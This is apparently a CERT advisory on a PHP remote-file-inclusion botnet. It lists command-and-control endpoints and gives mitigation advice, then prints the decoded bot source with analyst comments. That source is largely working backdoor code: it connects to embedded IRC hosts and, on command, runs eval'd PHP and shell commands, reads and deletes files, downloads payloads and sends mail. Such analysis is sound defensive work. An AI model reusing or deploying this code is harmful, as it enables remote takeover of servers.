new botnet on the rise
IUT-CERT has received reports of suspicious requests that show up as HTTP 404 entries in web server log files. In these requests, every GET parameter was set to the value http://babyc***b.fortunecity.co.uk/index.htm. Visiting the suspicious site, we found PHP malcode that had been encrypted by the attacker. After decrypting the code, we found that the attacker is trying to exploit a remote file inclusion vulnerability, which is why she injects the URL into the web site's variables. Successful exploitation of this vulnerability leads to execution of the malcode on the vulnerable server.
Once executed, the malcode tries to open a connection to one of the following host:port endpoints:
homelessman.weedns.com:8080
burningman.weedns.com:8080
ballslessman.weedns.com:8080
mcar.dd.blueline.be:8080
mcarlos.opendns.be:8080
ns10.suroot.com:8080
mcarlos.dnip.net:8080
ns03.americanunfinished.com:8080
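After a successful connection, the bot sends a random number, a password and a nickname to the bot handler and waits for commands. Botnets like this are also used for further organized attacks such as Distributed Denial of Service. Network administrators are advised to filter connections to the endpoints above. Because hostnames like these can change, it is also worth closing the entry point itself: disable PHP's allow_url_include (and allow_url_fopen where the application permits it) and never pass request parameters to include/require.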
The exploit code, further decoded:
<?
/* Run the script as unrestricted as possible from within PHP */
// Analysis note: both calls below set the execution time limit to 0 (no limit), so the
// request that included this file never times out while the socket loop is running.
set_time_limit(0);
ini_set("max_execution_time",0);
// NOTE(review): set_magic_quotes_runtime() was removed in PHP 7.0, so on PHP 7+ this call
// is a fatal error; the sample as listed presumably targets PHP 5.x or older.
set_magic_quotes_runtime(0);
ini_set('output_buffering',0);
// Turn off PHP error reporting for the rest of the script.
error_reporting(0);
// Called without an argument, ignore_user_abort() only returns the current setting and
// does not change it, so this line does not by itself keep the script alive after the
// HTTP client disconnects.
ignore_user_abort();
/*
 * Strip spaces from the string.
 * Removes every ASCII space character (" ") from $x and returns the result; other
 * whitespace such as tabs or newlines is left in place. Used by f_b64decode() before
 * Base64 decoding.
 */
function f_stripspaces($x)
{
$x = str_replace(" ", "", $x);
return $x;
}
/*
 * Base64-decode (with space stripping).
 * Used throughout the sample to hide plain protocol keywords and status messages as
 * Base64 literals (for example "UEFTUw==" decodes to "PASS"). This is encoding only,
 * no key is involved; the keyed variants are f_decrypt() and d69923efad5b7a().
 */
function f_b64decode($x)
{
$x = base64_decode(f_stripspaces($x));
return $x;
}
/*
* An array of options/parameters
*
* Analysis notes: every string value except "tr" is Base64 text that is passed through
* f_decrypt() before use; the quoted values in the trailing comments are the decoded
* forms given by the original analyst. The usage notes below are taken from
* vfc35fdc70d5fc().
*/
$nec12e0af93cb5 = array (
"po" => 8080, // TCP port passed to fsockopen() for the control connection
"sp" => "uJijk4iVsIXRmQ==", // "secretpass" - sent to the server with PASS when non-empty
"ch" => "aFZtlg==", // "##-u" - channel joined after the 001 welcome numeric
"ke" => "hniT", // "AES" - channel key sent with JOIN
"ha" => "dG1qQk1halK/nE6N", // "/:*!*@*.av$/" - regex matched against the sender prefix at login
"pa" => "fpekVYhVdlWQXGLBXnBWWId1hll1WVWJVFpYh1tahVs=", // "9dd4e461268c8034f5c8564e155c67a6" - compared with md5() of the login password
"tr" => "*", // command trigger: first character of a command word
"mrnd" => 9, // length passed to the random nickname / ident generators
"mo" => "cqtrig==", // "-x+i" - user mode requested with MODE after connecting
"ve" => "dmFyWIc=" // "1.27d" - string returned in the CTCP VERSION reply
);
/*
 * Main loop of the sample (analysis notes, not original author comments).
 *
 * Picks one of three embedded hostnames at random, opens a TCP connection to it on the
 * configured port and speaks IRC: PASS/USER/NICK registration, MODE + JOIN after the 001
 * welcome numeric, PONG replies to PING. Command words are taken from PRIVMSG lines and
 * from numeric 332 (channel topic) when the first word starts with the trigger
 * character. A sender has to authenticate first (MD5 of a password plus a regex on the
 * sender prefix); topic lines (332) pass the same check without authentication.
 * Command names are stored encrypted and compared via d69923efad5b7a(), so they are not
 * decoded in these notes; each case is described by the PHP functions it calls.
 *
 * What a defender can key on, from the visible code: an outbound connection from the web
 * server process to port 8080 carrying IRC verbs, a PHP request that never terminates
 * (time limit 0 plus this loop), and use of eval/popen/exec/mail/file()-over-URL from a
 * web context.
 *
 * The function calls itself again after a disconnect or a failed connection, so
 * reconnect attempts nest without a bound.
 */
function vfc35fdc70d5fc()
{
global $nec12e0af93cb5;
// Map of authenticated sender prefixes (key: "nick!user@host" token as received).
$mee11cbb19052e = array();
// Previous line read from the socket; used to skip an immediately repeated line.
$nd707b8140a662 = "";
/* Looks like an array of hostnames */
$t59b514174bffe = array(
"raKtho+Gs5fLh5iMnaWIiI+zUYSvkA==", // "homelessman.weedns.com"
"p6iyj4yPp5G/lFjVi6WHkpRuhpCt", // "burningman.weedns.com"
"p5SsjZaNpZfRk4vMVLeIiYWulk+jko4=", // "ballslessman.weedns.com"
);
// Random choice of control host: shuffle, then use element 0. Connect timeout is 15 s.
shuffle($t59b514174bffe);
if(($k351a1d2ad68bc = fsockopen(f_decrypt($t59b514174bffe[0]),$nec12e0af93cb5['po'],$a70106d0d82151,$p809b1abe3f111,15)))
{
// Random nickname of 'mrnd' characters (see pd988971435842()).
$a8052146769b14 = pd988971435842($nec12e0af93cb5['mrnd']);
if (strlen($nec12e0af93cb5['sp'])>0)
{
// "UEFTUw==" decodes to "PASS": server password from the config.
s56eacb300613d($k351a1d2ad68bc, f_b64decode("UEFTUw==")." ".f_decrypt($nec12e0af93cb5['sp']));
}
// "VVNFUg==" decodes to "USER": random ident, fixed "127.0.0.1 localhost", nick as real name.
s56eacb300613d($k351a1d2ad68bc, f_b64decode("VVNFUg==")." ".rfb0daa8f01135($nec12e0af93cb5['mrnd'])." 127.0.0.1 localhost :$a8052146769b14");
// "TklDSw==" decodes to "NICK".
s56eacb300613d($k351a1d2ad68bc, f_b64decode("TklDSw==")." $a8052146769b14");
while (!feof($k351a1d2ad68bc))
{
// One protocol line (at most 511 bytes), split on single spaces into tokens.
$g7fabc1404929c = trim(fgets($k351a1d2ad68bc,512));
$x6e2baaf3b97db = explode(" ",$g7fabc1404929c);
// Ignore a line that is identical to the previous one.
if(($g7fabc1404929c == $nd707b8140a662))
continue;
// "UElORw==" decodes to "PING"; answered with "PONG" ("UE9ORw==") and the same token.
if (isset($x6e2baaf3b97db[0]) && $x6e2baaf3b97db[0] == f_b64decode("UElORw=="))
{
s56eacb300613d($k351a1d2ad68bc, f_b64decode("UE9ORw==")." ".$x6e2baaf3b97db[1]);
}
// "MDAx" decodes to "001" (welcome numeric): set user mode ("TU9ERQ==" = "MODE") and
// join the configured channel with its key ("Sk9JTg==" = "JOIN").
else if (isset($x6e2baaf3b97db[1]) && $x6e2baaf3b97db[1] == f_b64decode("MDAx"))
{
s56eacb300613d($k351a1d2ad68bc, f_b64decode("TU9ERQ==")." $a8052146769b14 ".f_decrypt($nec12e0af93cb5['mo']));
s56eacb300613d($k351a1d2ad68bc, f_b64decode("Sk9JTg==")." ".f_decrypt($nec12e0af93cb5['ch'])." ".f_decrypt($nec12e0af93cb5['ke']));
}
// "NDMz" decodes to "433"; the branch re-sends NICK with the same nickname.
// NOTE(review): this tests $vdfff0a7fa1a55 (the word list of the previous PRIVMSG/332,
// unset until one has been parsed) rather than the current line's tokens - looks like
// a bug in the sample or in the decoding; confirm against the original.
else if(isset($vdfff0a7fa1a55[1]) && $vdfff0a7fa1a55[1] == f_b64decode("NDMz"))
{
s56eacb300613d($k351a1d2ad68bc, f_b64decode("TklDSw==")." $a8052146769b14");
}
// Removes an entry from the authenticated map when token 1 of the line is one of its keys.
else if (isset($x6e2baaf3b97db[1]) && isset($mee11cbb19052e[$x6e2baaf3b97db[1]]))
{
unset($mee11cbb19052e[$x6e2baaf3b97db[1]]);
}
// "UFJJVk1TRw==" decodes to "PRIVMSG"; numeric "332" is handled by the same branch.
else if (isset($x6e2baaf3b97db[1]) && ($x6e2baaf3b97db[1] == f_b64decode("UFJJVk1TRw==") || $x6e2baaf3b97db[1] == "332"))
{
// Message text = everything after the first " :" in the line, split into words.
$f78e731027d8fd = strstr($g7fabc1404929c," :");
$f78e731027d8fd = substr($f78e731027d8fd,2);
$vdfff0a7fa1a55 = explode(" ",$f78e731027d8fd);
// Sender prefix (token 0) and the nick part of it (text before "!", leading char dropped).
$k67b3dba8bc677 = $x6e2baaf3b97db[0];
$u7c6483ddcd99e = explode("!",$k67b3dba8bc677);
$u7c6483ddcd99e = substr($u7c6483ddcd99e[0],1);
// Silent flag: when TRUE, lf2f4e964f79d0() sends no reply.
$u73be252ca8221 = FALSE;
// CTCP VERSION request ("VkVSU0lPTg==" = "VERSION" wrapped in \1): answered with a
// NOTICE carrying the configured version string.
if ($vdfff0a7fa1a55[0] == "\1".f_b64decode("VkVSU0lPTg==")."\1")
{
s56eacb300613d($k351a1d2ad68bc,"NOTICE ".$u7c6483ddcd99e." :\1".f_b64decode("VkVSU0lPTg==")." ".f_decrypt($nec12e0af93cb5['ve'])."\1");
}
// A "-s" word anywhere in the message sets the silent flag.
for ($c865c0c0b4ab0e=0;$c865c0c0b4ab0e<count($vdfff0a7fa1a55);$c865c0c0b4ab0e++)
{
if($vdfff0a7fa1a55[$c865c0c0b4ab0e] == "-s")
{
$u73be252ca8221 = TRUE;
}
}
// Reply target: token 3 for a 332 line, the sender's nick when the message was addressed
// to this bot's nickname, otherwise token 2 of the line.
if ($x6e2baaf3b97db[1] == "332")
{
$j01b6e20344b68 = $x6e2baaf3b97db[3];
}
elseif ($x6e2baaf3b97db[2] == $a8052146769b14)
{
$j01b6e20344b68 = $u7c6483ddcd99e;
}
else
{
$j01b6e20344b68 = $x6e2baaf3b97db[2];
}
// If the first word equals this host's PHP_OS value it is dropped, so the next word
// becomes the command word.
if ($vdfff0a7fa1a55[0] == PHP_OS)
{
array_shift($vdfff0a7fa1a55);
}
// Only words starting with the trigger character ('tr', "*") are treated as commands.
if (substr($vdfff0a7fa1a55[0],0,1) == $nec12e0af93cb5['tr'])
{
// Commands are accepted from senders present in the authenticated map, and from any
// 332 line regardless of authentication.
if (isset($mee11cbb19052e[$k67b3dba8bc677]) || $x6e2baaf3b97db[1] == "332")
{
switch (substr($vdfff0a7fa1a55[0],1))
{
// Marks the sender's map entry FALSE and sends a reply ("b3V0" is Base64 for "out").
// NOTE(review): htmen() is not defined anywhere in this listing, so this call would
// fail as shown. The entry is set to FALSE rather than unset, and the gate above uses
// isset(), which is still true for FALSE.
case d69923efad5b7a("sKM="):
if ($x6e2baaf3b97db[1] != "332")
{
$mee11cbb19052e[$k67b3dba8bc677] = FALSE;
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68, htmen("b3V0"));
}
break;
// Sends "QUIT :I QUIT" (decoded literal), closes the socket and ends the PHP process.
case d69923efad5b7a("qGWaoKKb"):
s56eacb300613d($k351a1d2ad68bc, f_b64decode("UVVJVCA6SSBRVUlU"));
fclose($k351a1d2ad68bc);
exit(0);
break;
// Forwards the rest of the message to the server unchanged as a protocol line.
case d69923efad5b7a("tpWs"):
if (count($vdfff0a7fa1a55)>1)
{
s56eacb300613d($k351a1d2ad68bc, substr($f78e731027d8fd,strlen($vdfff0a7fa1a55[0])));
}
break;
// Directory listing: the given path, or the current working directory when none is
// given. One reply per entry, one second apart.
case d69923efad5b7a("sKc="):
if (isset($vdfff0a7fa1a55[1]))
{
$q954eef6d6eac5 = $vdfff0a7fa1a55[1];
}
else
{
$q954eef6d6eac5 = getcwd();
}
if (is_dir($q954eef6d6eac5))
{
if (($w736007832d216 = opendir($q954eef6d6eac5)))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("RGlyLy8gTm93IGxpc3Rpbmc6") ." \2".$q954eef6d6eac5."\2");
while (($f435ed7e9f07f7 = readdir($w736007832d216)) !== FALSE)
{
if ($f435ed7e9f07f7 != "." && $f435ed7e9f07f7 != "..")
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
"> (".filetype($q954eef6d6eac5."/".$f435ed7e9f07f7).") $f435ed7e9f07f7");
sleep(1);
}
}
// closedir() is called without the handle opened above.
closedir();
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("RGlyLy8gVW5hYmxlIHRvIGxpc3QgY29udGVudHMgb2Y=") . " \2".$q954eef6d6eac5."\2");
}
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("RGlyLy8=") . " \2".$q954eef6d6eac5."\2 " . f_b64decode("aXMgbm90IGEgZGlyIQ=="));
}
break;
// File read: relays the named file line by line (up to 255 bytes per read), one reply
// per second - i.e. disclosure of any file readable by the web server user.
case d69923efad5b7a("p5Wp"):
if (count($vdfff0a7fa1a55) > 1)
{
if (is_file($vdfff0a7fa1a55[1]))
{
if (($x0666f0acdeed3 = fopen($vdfff0a7fa1a55[1],"r")))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Q0FULy8gTm93IHJlYWRpbmcgZmlsZTo=") . " \2".$vdfff0a7fa1a55[1]."\2");
while(!feof($x0666f0acdeed3))
{
$v6438c669e0d0d = trim(fgets($x0666f0acdeed3,256));
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68, "> $v6438c669e0d0d");
sleep(1);
}
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68, "> [EOF]");
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Q0FULy8gQ291bGRuJ3Qgb3Blbg==") . " \2".$vdfff0a7fa1a55[1]."\2 for reading.");
}
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Q0FULy8=") . " \2".$vdfff0a7fa1a55[1]."\2 " . f_b64decode("aXMgbm90IGEgZmlsZQ=="));
}
}
break;
// Reports the current working directory.
case d69923efad5b7a("tKuZ"):
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("UFdELy8gQ3VycmVudCBkaXI6") ." ".getcwd());
break;
// Changes the working directory of the PHP process.
case d69923efad5b7a("p5g="):
if (count($vdfff0a7fa1a55) > 1)
{
if (chdir($vdfff0a7fa1a55[1]))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Q0QvLyBDaGFuZ2VkIGRpciB0bw==") ." ".$vdfff0a7fa1a55[1]);
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Q0QvLyBGYWlsZWQgdG8gY2hhbmdlIGRpcg=="));
}
}
break;
// Deletes the named file (unlink).
case d69923efad5b7a("tqE="):
if (count($vdfff0a7fa1a55) > 1)
{
if (unlink($vdfff0a7fa1a55[1]))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Uk0vLyBEZWxldGVk") . " \2".$vdfff0a7fa1a55[1]."\2");
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Uk0vLyBGYWlsZWQgdG8gZGVsZXRl")." \2".$vdfff0a7fa1a55[1]."\2");
}
}
break;
// touch() on the named path: creates the file or updates its timestamps, which
// matters when building a forensic timeline from mtimes.
case d69923efad5b7a("uKOqlZs="):
if (count($vdfff0a7fa1a55) > 1)
{
if (touch($vdfff0a7fa1a55[1]))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("VG91Y2gvLyBUb3VjaGVk") . " \2".$vdfff0a7fa1a55[1]."\2");
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("VG91Y2gvLyBGYWlsZWQgdG8gdG91Y2g=") . " \2".$vdfff0a7fa1a55[1]."\2");
}
}
break;
// Creates a symbolic link (word 2) pointing at word 1.
case d69923efad5b7a("t62inpySoA=="):
if (count($vdfff0a7fa1a55) > 2)
{
if (symlink($vdfff0a7fa1a55[1],$vdfff0a7fa1a55[2]))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("U3ltTGluay8vIFN5bWxpbmtlZA==") . " \2".$vdfff0a7fa1a55[2]."\2 To \2".$vdfff0a7fa1a55[1]."\2");
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("U3ltTGluay8vIEZhaWxlZCB0byBsaW5r") . " \2".$vdfff0a7fa1a55[2]."\2 To \2".$vdfff0a7fa1a55[1]."\2");
}
}
break;
// Changes the owner of a file (chown).
case d69923efad5b7a("p5ykqaE="):
if (count($vdfff0a7fa1a55) > 2)
{
if (chown($vdfff0a7fa1a55[1],$vdfff0a7fa1a55[2]))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Q2hvd24vLyBDaG93bmVk") ." \2".$vdfff0a7fa1a55[1]."\2 To \2".$vdfff0a7fa1a55[2]."\2");
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Q2hvd24vLyBGYWlsZWQgdG8gY2hvd24=") ." \2".$vdfff0a7fa1a55[1]."\2 To \2".$vdfff0a7fa1a55[2]."\2");
}
}
break;
// Changes file permissions (chmod); the mode word is passed through as received.
case d69923efad5b7a("p5yioZc="):
if (count($vdfff0a7fa1a55) > 2)
{
if(chmod($vdfff0a7fa1a55[1],$vdfff0a7fa1a55[2]))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Q2htb2QvLyBDaG1vZGRlZA==") . " \2".$vdfff0a7fa1a55[1]."\2 with permissions \2".$vdfff0a7fa1a55[2]."\2");
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Q2htb2QvLyBGYWlsZWQgdG8gY2htb2Q=") . " \2".$vdfff0a7fa1a55[1]."\2");
}
}
break;
// Creates a directory (mkdir).
case d69923efad5b7a("sZ+Zm6U="):
if (count($vdfff0a7fa1a55) > 1)
{
if (mkdir($vdfff0a7fa1a55[1]))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("TUtEaXIvLyBDcmVhdGVkIGRpcmVjdG9yeQ==")." \2".$vdfff0a7fa1a55[1]."\2");
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("TUtEaXIvLyBGYWlsZWQgdG8gY3JlYXRlIGRpcmVjdG9yeQ==")." \2".$vdfff0a7fa1a55[1]."\2");
}
}
break;
// Removes a directory (rmdir).
case d69923efad5b7a("tqGZm6U="):
if (count($vdfff0a7fa1a55)>1)
{
if (rmdir($vdfff0a7fa1a55[1]))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Uk1EaXIvLyBSZW1vdmVkIGRpcmVjdG9yeQ==") . " \2".$vdfff0a7fa1a55[1]."\2");
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Uk1EaXIvLyBGYWlsZWQgdG8gcmVtb3ZlIGRpcmVjdG9yeQ==") . " \2".$vdfff0a7fa1a55[1]."\2");
}
}
break;
// Copies a file from word 1 to word 2 (copy).
case d69923efad5b7a("p6Q="):
if (count($vdfff0a7fa1a55) > 2)
{
if (copy($vdfff0a7fa1a55[1], $vdfff0a7fa1a55[2]))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Q1AvLyBDb3BpZWQ=") ." \2".$vdfff0a7fa1a55[1]."\2 to \2".$vdfff0a7fa1a55[2]."\2");
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("Q1AvLyBGYWlsZWQgdG8gY29weQ==") ." \2".$vdfff0a7fa1a55[1]."\2 to \2".$vdfff0a7fa1a55[2]."\2");
}
}
break;
// Sends e-mail through the host's mail(): recipient (word 1), From address (word 2),
// subject (word 3) and body (message text from the offset given in word 4) all come
// from the operator, so an infected server shows up as a mail source.
case d69923efad5b7a("sZWeng=="):
if (count($vdfff0a7fa1a55)>4)
{
$l099fb995346f3 = "From: <".$vdfff0a7fa1a55[2].">\r\n";
if (mail($vdfff0a7fa1a55[1], $vdfff0a7fa1a55[3], substr($f78e731027d8fd,$vdfff0a7fa1a55[4]), $l099fb995346f3))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("TWFpbC8v") . " Message sent to \2".$vdfff0a7fa1a55[1]."\2");
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("TWFpbC8v") . " Send failure");
}
}
break;
// Replies with md5() of word 1 (no check that word 1 exists).
case d69923efad5b7a("sZ+ilmg="):
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("TUQ1Ly8=") . " ".md5($vdfff0a7fa1a55[1]));
break;
// DNS lookup: reverse (gethostbyaddr) when word 1 is four numeric dot-separated parts,
// forward (gethostbyname) otherwise.
case d69923efad5b7a("qKKo"):
if (isset($vdfff0a7fa1a55[1]))
{
$q957b527bcfbad = explode(".",$vdfff0a7fa1a55[1]);
if (count($q957b527bcfbad)==4 && is_numeric($q957b527bcfbad[0]) && is_numeric($q957b527bcfbad[1])
&& is_numeric($q957b527bcfbad[2]) && is_numeric($q957b527bcfbad[3]))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("RE5TLy8=") . " ".$vdfff0a7fa1a55[1]." -> ".gethostbyaddr($vdfff0a7fa1a55[1]));
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("RE5TLy8=") . " ".$vdfff0a7fa1a55[1]." -> ".gethostbyname($vdfff0a7fa1a55[1]));
}
}
break;
// Sends "QUIT :QUIT..." (decoded literal), closes the socket and starts over by
// calling this function again (new random host and nickname).
case d69923efad5b7a("tpmoppSWqQ=="):
s56eacb300613d($k351a1d2ad68bc, f_b64decode("UVVJVCA6UVVJVC4uLg=="));
fclose($k351a1d2ad68bc);
vfc35fdc70d5fc();
break;
// Picks a new random nickname, with the length taken from word 1 or from 'mrnd'.
case d69923efad5b7a("tqI="):
if(isset($vdfff0a7fa1a55[1]))
{
$a8052146769b14 = pd988971435842((int)$vdfff0a7fa1a55[1]);
s56eacb300613d($k351a1d2ad68bc, f_b64decode("TklDSw==")." $a8052146769b14");
}
else
{
$a8052146769b14 = pd988971435842($nec12e0af93cb5['mrnd']);
s56eacb300613d($k351a1d2ad68bc, f_b64decode("TklDSw==")." $a8052146769b14");
}
break;
// eval() of the remaining message text: arbitrary PHP supplied over the control channel
// runs inside the web server process. Together with the popen/exec cases below this is
// what makes the infection a full remote code execution foothold.
case d69923efad5b7a("tJyl"):
if (count($vdfff0a7fa1a55) > 1)
{
eval(substr($f78e731027d8fd,strlen($vdfff0a7fa1a55[0])));
}
break;
// Fetches word 1 with file() (a URL, judging by the reply texts) and writes the lines
// to the local path in word 2 - the route by which further payloads can reach the host.
// The destination is opened for writing (and truncated) before the fetch is attempted.
case d69923efad5b7a("q5mp"):
if (count($vdfff0a7fa1a55) > 2)
{
if (!($x0666f0acdeed3 = fopen($vdfff0a7fa1a55[2],"w")))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("R2V0Ly8gUGVybWlzc2lvbiBkZW5pZWQ="));
}
else
{
if (!($zb5eda0a74558a = file($vdfff0a7fa1a55[1])))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("R2V0Ly8gQmFkIFVSTC9ETlMgZXJyb3I="));
}
else
{
for ($c865c0c0b4ab0e = 0; $c865c0c0b4ab0e < count($zb5eda0a74558a); $c865c0c0b4ab0e++)
{
fwrite($x0666f0acdeed3,$zb5eda0a74558a[$c865c0c0b4ab0e]);
}
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("R2V0Ly8=") . " \2".$vdfff0a7fa1a55[1]."\2 downloaded to \2".$vdfff0a7fa1a55[2]."\2");
}
fclose($x0666f0acdeed3);
}
}
break;
// Reports the server's IP address and host name from $_SERVER.
case d69923efad5b7a("sp0="):
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("TmV0SW5mby8v") . " IP: ".$_SERVER['SERVER_ADDR']." Hostname: ".$_SERVER['SERVER_NAME']);
break;
// Host fingerprint: process user, PID, PHP version, OS, server software, admin address,
// document root, HTTP host and the request URI - the last one being the URL of the
// vulnerable page through which this file was included.
case d69923efad5b7a("t50="):
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68, f_b64decode("U3lzaW5mby8v")
. " [User: ".get_current_user()."] [PID: ".getmypid()
."] [Version: PHP ".phpversion()."] [OS: ".PHP_OS."] [Server_software: "
.$_SERVER['SERVER_SOFTWARE']."] [Server_name: ".$_SERVER['SERVER_NAME']."] [Admin: "
.$_SERVER['SERVER_ADMIN']."] [Docroot: ".$_SERVER['DOCUMENT_ROOT']."] [HTTP Host: "
.$_SERVER['HTTP_HOST']."] [URL: ".$_SERVER['REQUEST_URI']."]");
break;
// TCP connect test against host word 1 / port word 2 with a 5 s timeout; reports
// Open or Closed. The socket returned by fsockopen() is never closed.
case d69923efad5b7a("tKOnpqKUmuw="):
if (isset($vdfff0a7fa1a55[1],$vdfff0a7fa1a55[2]))
{
if (fsockopen($vdfff0a7fa1a55[1],(int)$vdfff0a7fa1a55[2],$r56bd7107802eb,$t341be97d9aff9,5))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
"".f_b64decode("UG9ydENoay8v") ." ".$vdfff0a7fa1a55[1].":".$vdfff0a7fa1a55[2]." is \2Open\2");
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
"".f_b64decode("UG9ydENoay8v") ." ".$vdfff0a7fa1a55[1].":".$vdfff0a7fa1a55[2]." is \2Closed\2");
}
}
break;
// Reports php_uname().
case d69923efad5b7a("uaKWn5g="):
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68,
f_b64decode("VW5hbWUvLw==")." " .php_uname());
break;
// Reports the process ID.
case d69923efad5b7a("rZg="):
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68, f_b64decode("SUQvLw==")." ".getmypid());
break;
// Runs the remaining message text as a shell command via popen() and relays each
// non-empty output line, one per second. The pipe is never closed with pclose().
case d69923efad5b7a("p6GZ"):
if (count($vdfff0a7fa1a55)>1)
{
$m1dccadfed7bcb = popen(substr($f78e731027d8fd,strlen($vdfff0a7fa1a55[0])),"r");
while (!feof($m1dccadfed7bcb))
{
$f734515cbd3636 = trim(fgets($m1dccadfed7bcb,512));
if (strlen($f734515cbd3636)>0)
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68, "> ".$f734515cbd3636);
sleep(1);
}
}
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68, f_b64decode("PiBbRU9GXQ=="));
}
break;
// Runs the remaining message text through t54d54a126a783() (exec/shell_exec/system/
// passthru/popen fallback chain); the returned output is discarded here.
case d69923efad5b7a("qayalaiYmg=="):
t54d54a126a783(substr($f78e731027d8fd,strlen($vdfff0a7fa1a55[0])));
break;
}
}
else
{
// Sender is not authenticated: the only command handled is the login.
switch(substr($vdfff0a7fa1a55[0],1))
{
// Login: md5() of word 1 must equal the configured hash ('pa') and the sender prefix
// must match the configured regex ('ha'). The comparison uses loose "==".
// A rejection is announced in the configured channel with the silent flag forced off.
case d69923efad5b7a("bg=="):
if (isset($vdfff0a7fa1a55[1]) && md5($vdfff0a7fa1a55[1]) == f_decrypt($nec12e0af93cb5['pa'])
&& preg_match(f_decrypt($nec12e0af93cb5['ha']),$k67b3dba8bc677))
{
lf2f4e964f79d0($k351a1d2ad68bc, $u73be252ca8221, $j01b6e20344b68, f_b64decode("UmVhZHkvLyBPaw=="));
$mee11cbb19052e[$k67b3dba8bc677] = TRUE;
}
else
{
lf2f4e964f79d0($k351a1d2ad68bc, FALSE, f_decrypt($nec12e0af93cb5['ch']), f_b64decode("UmVhZHkvLyByZWplY3RlZA=="));
}
break;
}
}
}
}
// Remember this line so that an immediate duplicate is skipped on the next iteration.
$nd707b8140a662 = $g7fabc1404929c;
}
// Connection ended: close, wait 3 s and reconnect by calling this function again.
fclose($k351a1d2ad68bc);
sleep(3);
vfc35fdc70d5fc();
}
else
{
// Connection failed: retry immediately, with no delay between attempts. The shuffle
// here has no lasting effect because the host list is rebuilt at the start of each call.
shuffle($t59b514174bffe);
vfc35fdc70d5fc();
}
}
/*
 * Writes one protocol line to the control socket.
 * $s317d37b0edc7b is the stream returned by fsockopen(); $f78e731027d8fd is the line
 * text, to which "\r\n" is appended. The fwrite() result is not checked.
 */
function s56eacb300613d($s317d37b0edc7b, $f78e731027d8fd)
{
fwrite($s317d37b0edc7b,"$f78e731027d8fd\r\n");
}
/*
